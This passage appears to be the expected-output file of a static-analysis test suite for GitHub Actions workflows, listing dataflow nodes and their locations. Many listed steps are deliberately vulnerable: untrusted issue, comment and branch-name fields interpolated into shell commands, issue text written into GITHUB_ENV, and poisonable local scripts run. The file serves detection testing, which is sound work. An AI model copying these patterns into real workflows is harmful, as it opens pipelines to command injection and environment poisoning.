.github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | .github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | 